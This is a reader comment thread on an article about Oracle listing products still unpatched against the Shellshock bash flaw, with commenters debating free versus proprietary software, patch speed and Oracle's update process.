Oracle SHELLSHOCKER - data titan lists unpatchables

Re: Free software solves all problems ever

You realise those embedded devices will use busybox, yes? And that busybox isn't vulnerable to this?

Try again.

Do your research before you buy

Firstly - do you actually have an embedded device with bash installed? Bash is big, and if embedded devices have a shell at all it is usually one of the mini ones like lash which is not vulnerable to this flaw.

Secondly, pretend a flaw is found in lash tomorrow, and you have a device for which you cannot download the source code, apply a patch, cross compile and install new firmware. <shouting>Why did you buy it?</shouting>. There are plenty of hackable devices out there. If you want a router, pick one that is easy to install openwrt on. The reason locked down devices exist at all is because people buy them. Stop it at once, or you have to pay whatever the vendor demands for updates.

Re: Free software solves all problems ever

No vote up or down, but a general observation on the El Reg scene. Sarcasm and irony don't appear to translate well. (I'm making an assumption, here, which as we all know . . . )

Assuming AC was being sarcastic, I suspect that the response is associated with whatever gene predisposes IT specialists, when confronted by some monumental SNAFU in a program's operation, to respond, "Yes, it does that."

Re: Free software solves all problems ever

You were right to latch onto Mr. Sullivan's quote, but I think you missed the real issues. This problem wasn't quick to fix because bash is free, it was quick to fix because once shown the issue the bash maintainers could address it rapidly. That any one may contribute compounds the issue of quality control. Fortunately, as a practical matter, it's generally project code base experts who would bother.

However, that only fixes the source code. Because the software is free and as is, the users are on their own as to whether a fix of one things breaks another in their confederation of packages.

Proprietary code vendors do not do the work of angels, but the biggest ones such as Apple, Oracle, Microsoft, etc., generally think about the effects of the fix on the paying customer, and if there's a show-stopper problem, holds off until the patch does no harm to the software they sell. This takes time, both in the testing and the revising. Apple and Microsoft recently put out patches that had to be withdrawn. Incompetence? Maybe. Shipping more quickly than they should? Definitely.

Quick is not the virtue, correct is. Mr. Sullivan should also remember that we users aren't grading on a curve. Many will be scrambling or vulnerable until the bash patches are installed and regressions addressed and to them it doesn't matter that Microsoft will release patches in 10 days that it could have released last week, as bash is the thing that disrupted the schedule this week and possibly month. That the problem could have been fixed quickly raises the question why was it not fixed years sooner. And if the response is that the bash reliant aren't giving money to the project, would that be an eye-roller? I ask because right and maintained are why people give money to proprietary code vendors. To Mr. Sullivan I'd recommend coming down from the high horse because everyone has the same problems. Code is buggy and frequently one person's fix is another person's break. It takes time and money to reduce get things right. A code license is not a silver bullet.

Re: Free software solves all problems ever

"warning that many Oracle customers will have to wait awhile longer to receive patches."

Service as usual then. Remind me why anyone sane would use Oracle products given a choice??

Re: Free software solves all problems ever

"attributed the speedy resolution of the Shellshock issue to the fact that Bash is free software"

But it isn't fully fixed yet. And the partial patches that we have have been rushed out of the door without proper regression and integration testing.

"the fact that Bash is free software, adding that proprietary software often ships with hidden bugs that customers cannot fix by themselves."

So how come Microsoft - for instance - consistently have a faster average fix time / fewer days at risk that all of the major enterprise Linux distributions?

Come on its free software!

I mean, if you were made to pay lots for support, and the company was somehow able to create a database of customers and the products they have on support, then maybe they could just manage email folk to let them know. But that would cost money.

Oh wait...

Ridiculous kneejerk response. Like Microsoft, Apple IBM and any other huge software vendor, they have millions of customers, its wholly impractical at that scale to contact each and every customer, the back end support systems will anyway have details of for example, the person in procurement who made the order years back, rather than an actual person responsible for bug fixes.

They also all have have systems that you can connect to which will tell you what needs an update for the actual software you have installed rather than what you bought (not the same thing at all) which any responsible IT organisation will be using and monitoring, rather than waiting passively for Oracle / IBM / SAP etc etc to send an email to "fred@procurement dot com" who probably also buys software for every other vendor as well.

If you ever used oracle products you will know customers get updates via the patch server and technet system.

That is if you paid for the software and did not steal it.

Re: Perhaps someone familiar with Oracle products can tell me...

Even if they can, my guess is they won't. Given what enterprises pay for Oracle and the likelihood that manually fixing a small part of something yourself will invalidate the support agreement I suspect competent sysadmins leave these things alone and let whoever bought Oracle take the flak if problems come up.

Re: Perhaps someone familiar with Oracle products can tell me...

Yes to the majority of the affected products, and some of the exploits make it nearly impossible to know if the systems have been 'root kitted' without a full binary audit from a trusted source, or leaked information somewhere.

And whats worse, is the outages that will be impacted to business, services over the next few weeks / months / years to remediate the affected products with a new version of BASH.

Just to note the impact of ShellShock, From the Oracle security bulletin :

Solaris 8,9,10; BASH is not the root shell but is available to users,applications, etc for use. Any service running under BASH or cgi script may be exploitable. As a minimum, a service / application, etc restart would be required after the patches are applied / tested.

Solaris 11; BASH is the root shell and is also available to users, applications, etc for use. Any service running under BASH or cgi script may be exploitable. As a minimum, a system reboot would be required after the patches are applied / tested.

Oracle LINUX; same restrictions as RedHat, reboot, etc.

ILOMS & XSCF; Firmware upgrade, and hope not to loose the configs. Both have web interfaces.

Oracle VM 2.2, 3.2, 3.3; reboot of all your LDOMS after patches are applied / tested.

The CISCO rebadged fibre channel switches may need a reboot, outage affecting all connected fibre's / systems / etc.

Im surprised that they havn't listed Oracle Enterprise Manager as yet considering its 'heavy' web interface along with it's use of shell / java scripts.

Re: What else?

"Expect many more of these issues to surface."

Yep - Java will probably be next. Oh, wait....

Re: Proprietary software vendors - what do they do?

Non free *nix ditros - what do they do?

- Build a system using other people's work or more likely outdated versions of other people's work. Or sometimes cutting edge that don't really work all that well or have been extensively tested.

- Take customers' money

- Take whatever time it takes and push updates as you feel like. Answer phone if the sucker, i mean customer, actually has a support contract.

That's adding value right there too.

That said, Slack fan and will die one, but i see no difference between Proprietary and Enterprise *nix. Same poopoo different smell. And source availability is only meaningful if you have the in house expertise to fix/apply it yourself, whether the FOSS people like to admit it or not.

Re: New patch out

"there is another patch out in the bash directory "

Like trying to fix the Titanic with Elastoplast....